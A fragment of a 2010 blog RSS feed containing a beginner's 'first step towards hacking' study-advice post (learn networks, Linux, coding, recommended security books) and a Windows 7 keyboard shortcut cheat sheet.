&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;What are these tools ? Why are they used for ? How to use it ? are some of the questions that are striking your head.&amp;nbsp; Chill all dudes &amp;amp; babes, I am here to help you with each of the tools listed above.&amp;nbsp; All you have to do is first download them all &amp;amp; place in your root directory.&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Your First Step Towards Hacking</title><link>http://0dl.blogspot.com/2010/11/your-first-step-towards-hacking.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 12:30:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-8137820490744918405</guid><description>&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Hello Folks,&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;With my very first post, I am trying to divert you from tutorials. I am assuming you surf daily, download too much stuff, find cracks &amp;amp; serials &amp;amp; hacking tutorials.&amp;nbsp; This group is called as anarchists. This is the very beginning step of hacking. But many people stay in the same zone &amp;amp; never get promoted to the real penetration. The one I would like to share that you need to read a lot (very much than you can think), otherwise you can loose the thing.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Basic principle behind hacking is learn how the things are constructed, You can easily find the way to destruct it. There are some general mistakes in making things, you can know it only when you try to make it too.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;When you make mistake while creating something, if someone try to take over that mistake &amp;amp; use it as a security hole to intrude in your system is called as hacker. So you need to learn the construction. The construction of following things:&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Networks :&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1. How Network is Created&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;2. How Firewalls are placed&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;3. Topology of The Network&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;4. Encryption&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Web/Internet:&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1.&amp;nbsp;&lt;/strong&gt;How a website is created, how they run (For that have some website, learn some potential problems in making a website, if you don’t have budget, then search for free hosts &amp;amp; domains )&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;2. How a blog is created &amp;amp; managed&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Applets/ Applications:&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1. Learn How the application are develop (Try to develop something, just for practice)&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;2. Learn specially apps of Browsers, WordPress, Twitter, Soft wares.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Platforms:&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1. You must have command over Linux&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&amp;nbsp;&lt;/strong&gt;&amp;amp; Windows.&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;2. If you have Mac, that will be great, but it is not in essential list.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Gadgets:&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Keep track of all the gadgets like – cellphones, their operating systems, net books, PSP, gaming consoles, google android, mobile windows, their apps everything.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Coding&amp;nbsp;&lt;/strong&gt;:&lt;br /&gt;
If you can not code then you can not create. So You have to have hand on Java, C and any of Web programming language but prefer PHP &amp;amp; HTML&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;This is too big list . . huh?&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;This is shortest ever list I have ever seen to be very loyal to you. Really, You don’t have to do thins in one day or something. You get all books for beginners like, networks for dummies, Java black book.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;You have to read constantly. I am trying to collect here some of the best things which you can use it as your notes for hacking stuff. So be updated with it. But at least know the networks &amp;amp; Linux, so You can learn faster. Other things are your homework, you have read on net, try to create &amp;amp; all this stuff, you need to do it on your own. I am all here to he lo you in it. Any type of problem you have,We are here to help. You can mail us, comment here or by any means I will try to make things better for you.&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Just keep the patience &amp;amp;&amp;nbsp; confidence. This is your first step to hacking – all you’re doing it for your curiosity.&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;And curiosity is not a crime .&amp;nbsp; .&amp;nbsp; .&lt;/strong&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;If you are good at all the things listed above I would like to Recommend some books:&lt;/em&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;1. Network Security: Private Communication in Public World (PHI Publication) – Its about Cryptography/ Encryption&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;2. Thinking Beyond Firewalls&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;3. Linux Security Cookbook&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;(Don’t read any book like : hacking gmail, how to&amp;nbsp; hack, hacking secrets … blah, blah , blah- They are not for hackers)&lt;/em&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Windows 7 Cheat Sheet</title><link>http://0dl.blogspot.com/2010/11/windows-7-cheat-sheet.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 12:25:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-4616888254078837149</guid><description>&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;As you all know Windows 7 RC3 is launched. Here’s a little cheat sheet I made up for some of the handy new hot key combination, many of which I’ve become quite dependent on!&lt;/div&gt;&lt;h2 style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; font: normal normal normal 2.3em/normal Georgia, 'Times New Roman'; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;From Desktop&lt;/h2&gt;&lt;ol style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + Tab&lt;/strong&gt;&amp;nbsp;: Aero [press Tab to cycle between Windows]&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + E&lt;/strong&gt;&amp;nbsp;: Windows Explorer is launched.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + R&lt;/strong&gt;&amp;nbsp;:&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Run&lt;/strong&gt;&amp;nbsp;Command is launched.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + F&lt;/strong&gt;&amp;nbsp;: Search (which is there in previous Windows versions too)&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + X&amp;nbsp;&lt;/strong&gt;: Mobility Center&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + L&amp;nbsp;&lt;/strong&gt;: Lock Computer (It is there from the earlier versions as well)&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + U&amp;nbsp;&lt;/strong&gt;: Launches Ease of Access&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + P&lt;/strong&gt;&amp;nbsp;: Projector&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + T&lt;/strong&gt;&amp;nbsp;: Cycle Super Taskbar Items&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + S&lt;/strong&gt;&amp;nbsp;: OneNote Screen Clipping Tool [requires OneNote]&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + M&amp;nbsp;&lt;/strong&gt;: Minimize All Windows&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + D&lt;/strong&gt;&amp;nbsp;: Show/Hide Desktop&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + Up&amp;nbsp;&lt;/strong&gt;: Maximize Current Window&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + Down&lt;/strong&gt;&amp;nbsp;: Restore Down / Minimize Current Windows&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + Left&lt;/strong&gt;&amp;nbsp;: Tile Current Window to the Left&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + Right&lt;/strong&gt;&amp;nbsp;: Tile Current Windows to the Right&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;[Continue pressing the Left and Right keys to rotate the window as well]&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + # (#&lt;/strong&gt;&amp;nbsp;is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar.&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Example&lt;/strong&gt;&amp;nbsp;Win+1 launches first pinned app, Win+2 launches second, etc.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + =&amp;nbsp;&lt;/strong&gt;: Launches the Magnifier&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + Plus :&amp;nbsp;&lt;/strong&gt;Zoom&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&amp;nbsp;&lt;/strong&gt;in&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + Minus :&lt;/strong&gt;&amp;nbsp;Zooms out&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Windows Key + Space :&amp;nbsp;&lt;/strong&gt;Peek at the desktop&lt;/li&gt;
&lt;/ol&gt;&lt;h2 style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; font: normal normal normal 2.3em/normal Georgia, 'Times New Roman'; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;From Windows Explorer&lt;/h2&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;22.&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&amp;nbsp;Alt + Up&lt;/strong&gt;&amp;nbsp;: Go up one level&lt;br /&gt;
23.&amp;nbsp;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Alt + Left/ Right&amp;nbsp;&lt;/strong&gt;: Back/ Forward&lt;br /&gt;
